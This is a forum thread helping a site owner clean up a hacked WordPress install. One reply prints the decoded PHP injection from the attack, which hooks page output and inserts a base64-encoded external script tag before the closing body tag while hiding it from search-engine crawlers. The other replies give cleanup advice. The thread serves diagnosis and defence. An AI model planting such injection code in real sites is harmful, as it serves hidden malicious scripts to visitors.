Guest
G
Soldato
The base64 thing is a complete pain. I had it happen to someone's shop (they didn't have backups) and it infected hundreds of files.
Did you save the string before deleting it? If you can post it I can probably tell you which files it infected / was using for the infection.
Looks like you've cleared the redirect now though.
Did you save the string before deleting it? If you can post it I can probably tell you which files it infected / was using for the infection.
Looks like you've cleared the redirect now though.
Soldato
The hack I saw infected all .php files and probably more; check the contents of .htaccess to make sure it's not doing something in there too.
As above it could have come from malware on your PC which is stealing Filezilla passwords. On the store I looked at it looked like it might have come from exploiting one of the admin files; make sure you use the latest version of Wordpress and keep it up to date.
Here's the "decrypted" code from above if you're interested, it's still obfuscated and somewhat of a pain to decrypt:
PHP:
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])) {
$GLOBALS['mr_no']=1;
if(!function_exists('mrobh')) {
if(!function_exists('gml')) {
function gml() {
if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly93d3cua2Rqa2Zqc2tkZmpsc2tkamYuY29tL2pzLnBocCI+PC9zY3JpcHQ+");
}
return "";
}
}
if(!function_exists('gzdecode')) {
function gzdecode($R5A9CF1B497502ACA23C8F611A564684C) {
$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
$RBE4C4D037E939226F65812885A53DAD9=10;
$RA3D52E52A48936CDE0F5356BB08652F2=0;
if($R30B2AB8DC1496D06B230A71D8962AF5D&4) {
$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
}
if($R30B2AB8DC1496D06B230A71D8962AF5D&8) {
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
}
if($R30B2AB8DC1496D06B230A71D8962AF5D&16) {
$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
}
if($R30B2AB8DC1496D06B230A71D8962AF5D&2) {
$RBE4C4D037E939226F65812885A53DAD9+=2;
}
$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
if($R034AE2AB94F99CC81B389A1822DA3353===FALSE) {
$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
}
return $R034AE2AB94F99CC81B389A1822DA3353;
}
}
function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B) {
Header('Content-Encoding: none');
$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)) {
return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
} else {
return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
}
}
ob_start('mrobh');
}
}Soldato
That htaccess looks fine. Might be a good idea to look at scheduling backups of all the files in future just incase though.
You should be able to keep your database (but reset all passwords) if you have a lot of content especially.
You should be able to keep your database (but reset all passwords) if you have a lot of content especially.
Soldato
It it not just as likely to be a bug in Wordpress that caused the infection? Wordpress do release updates to fix exploits but you still have to install them yourself.